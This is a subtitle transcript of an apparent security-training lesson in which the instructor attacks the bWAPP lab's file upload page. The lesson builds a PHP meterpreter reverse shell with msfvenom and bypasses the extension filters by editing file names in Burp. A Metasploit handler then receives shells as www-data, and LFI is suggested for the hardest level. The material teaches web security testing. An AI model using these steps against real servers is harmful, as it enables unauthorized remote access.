1 00:00:00,480 --> 00:00:07,710 Now, another problem that you will probably see while you are testing is unrestricted file upload forms.
2 00:00:08,870 --> 00:00:12,860 And sometimes you can bypass restrictions if they're not properly coded.
3 00:00:13,780 --> 00:00:21,340 So in this lesson, we are going to be dealing with an unrestricted file upload challenge; you'll see
4 00:00:21,340 --> 00:00:21,900 why in a minute.
5 00:00:22,360 --> 00:00:29,260 So go to Kali and log in to bWAPP and open the Unrestricted File Upload page from the menu.
6 00:00:32,110 --> 00:00:36,130 Now, to see how it works, browse and then choose a picture on your computer.
7 00:00:37,980 --> 00:00:39,360 And then upload the file.
8 00:00:40,580 --> 00:00:47,300 And you will see a link below, so click it to see the image. Yeah, I uploaded it.
9 00:00:48,890 --> 00:00:55,070 So, OK, enable FoxyProxy and I'm going to arrange the view for you here, so
10 00:00:56,690 --> 00:00:57,610 we can look at the code.
11 00:01:02,920 --> 00:01:04,870 Now, there's no check for the low level.
12 00:01:06,060 --> 00:01:09,960 But for medium, file_upload_check_1 is called.
13 00:01:11,180 --> 00:01:13,760 And for the high level, check 2 is called.
14 00:01:15,200 --> 00:01:21,350 OK, exit now. I created a folder for this example before, so I'm going to go to that folder.
15 00:01:22,290 --> 00:01:25,890 And I'm going to prepare a shell with the msfvenom tool.
16 00:01:27,020 --> 00:01:34,910 So type msfvenom -p php/meterpreter/reverse_tcp for the payload.
17 00:01:38,100 --> 00:01:45,960 And LHOST=192.168.204.128 for the local host address, and
18 00:01:45,960 --> 00:01:52,500 LPORT=4443 for the local port, and then the file name.
19 00:01:54,220 --> 00:01:58,330 And now we can provide some other parameters to msfvenom.
20 00:02:00,200 --> 00:02:03,350 But we don't need this for this example.
21 00:02:04,340 --> 00:02:05,120 So.
22 00:02:07,690 --> 00:02:09,370 OK, the payload is created.
23 00:02:10,700 --> 00:02:14,870 So here it is, my folder, and this is the content.
24 00:02:16,260 --> 00:02:20,010 All right, so we're done here, so then go back to Firefox.
25 00:02:21,110 --> 00:02:26,840 Browse for images, but choose the shell file and upload it.
26 00:02:28,430 --> 00:02:30,660 The upload request is in Burp on the right.
27 00:02:31,890 --> 00:02:34,110 And you can see the content of the file.
28 00:02:35,910 --> 00:02:40,200 And the content type is application/x-php.
29 00:02:40,950 --> 00:02:41,970 OK, so let it go.
30 00:02:44,060 --> 00:02:46,310 And the link appears on the page.
31 00:02:47,670 --> 00:02:50,040 But now, before clicking, let's go back to the terminal.
32 00:02:51,880 --> 00:02:58,060 Now, I forgot to create a handler to capture the reverse connection, so open Metasploit.
33 00:03:01,240 --> 00:03:05,470 OK, so use exploit/multi/handler.
34 00:03:07,090 --> 00:03:11,440 And then set the payload to reverse_tcp.
35 00:03:15,580 --> 00:03:18,490 And you can set LHOST to the IP address of Kali.
36 00:03:22,350 --> 00:03:24,750 And set the LPORT to 4443.
37 00:03:26,650 --> 00:03:28,930 So one more time, we'll show the options.
38 00:03:30,600 --> 00:03:34,950 And then type exploit -j to run a background job.
39 00:03:35,820 --> 00:03:39,720 OK, so go to Firefox and click here to see the shell.
40 00:03:41,580 --> 00:03:44,250 And the session is open in the terminal.
41 00:03:45,770 --> 00:03:48,500 So type sessions to list the sessions.
42 00:03:49,770 --> 00:03:52,140 And interact with session one.
43 00:03:53,590 --> 00:03:57,550 Type getuid for the user of the open shell.
44 00:03:58,630 --> 00:04:05,410 And then info; you see the basic info about the open shell. Exit the shell.
45 00:04:06,540 --> 00:04:10,260 And go back to Firefox. So now I will increase the level.
46 00:04:11,430 --> 00:04:12,420 So choose medium.
47 00:04:13,680 --> 00:04:15,570 And try to upload the shell again.
48 00:04:19,700 --> 00:04:23,600 And there's an error, because these extensions are not allowed.
49 00:04:25,300 --> 00:04:27,430 OK, so enable interception.
50 00:04:28,850 --> 00:04:30,830 And then upload the shell file again.
51 00:04:33,530 --> 00:04:35,180 That request is here in Burp.
52 00:04:37,100 --> 00:04:44,060 OK, so change the extension in the file name and just add 3 to the end, that's all.
53 00:04:45,080 --> 00:04:46,340 And send the request.
54 00:04:47,820 --> 00:04:54,270 And a link for viewing the uploaded image is right here on the page, but before we do that,
55 00:04:54,630 --> 00:04:55,710 let's set up a listener.
56 00:04:56,580 --> 00:05:01,380 So start the handler in Metasploit by typing exploit -j.
57 00:05:04,570 --> 00:05:05,740 Now click the link.
58 00:05:07,790 --> 00:05:09,440 Perfect, the session is open.
59 00:05:11,020 --> 00:05:12,940 So interact with session two.
60 00:05:14,700 --> 00:05:19,950 And we'll run getuid; the user is www-data.
61 00:05:21,020 --> 00:05:24,950 And then info for the basic information about the shell.
62 00:05:26,270 --> 00:05:27,170 And then you can exit.
63 00:05:28,690 --> 00:05:30,430 Now, go back to Firefox again.
64 00:05:31,520 --> 00:05:33,980 And I'm going to increase the level one more.
65 00:05:35,040 --> 00:05:39,900 So select high and now try to upload the shell file again.
66 00:05:42,450 --> 00:05:43,920 And there's our friend, the error.
67 00:05:45,440 --> 00:05:49,800 But this time it allows only these extensions.
68 00:05:50,650 --> 00:05:55,370 OK, so enable interception and upload the file.
69 00:05:57,720 --> 00:06:02,160 And this time, the problem can be solved by adding a suitable extension to the file name.
70 00:06:04,710 --> 00:06:06,200 And let it go.
71 00:06:08,390 --> 00:06:11,810 And there's the upload; problem solved.
72 00:06:12,590 --> 00:06:13,250 Here's a link.
73 00:06:14,790 --> 00:06:17,010 So open the terminal and start the handler.
74 00:06:18,240 --> 00:06:19,740 OK, it is done.
75 00:06:21,930 --> 00:06:22,830 Now click the link.
76 00:06:24,870 --> 00:06:26,010 Hey, nothing happened.
77 00:06:27,230 --> 00:06:28,130 There's no session.
78 00:06:29,310 --> 00:06:30,030 It doesn't work.
79 00:06:31,040 --> 00:06:40,070 Because the application tries to open an image file, but remember, it's a file, so it gets confused,
80 00:06:40,070 --> 00:06:42,260 and throws an error without executing it.
81 00:06:43,600 --> 00:06:46,960 So we cannot directly execute this shell.
82 00:06:47,850 --> 00:06:56,370 But remember, we discovered LFI on the web app, so we can use LFI to include our shell into the application.
83 00:06:57,350 --> 00:06:58,860 But that's for you to do.
84 00:06:59,300 --> 00:07:02,630 I know you know how, because we did LFI several times.
85 00:07:03,380 --> 00:07:04,190 Have fun with that.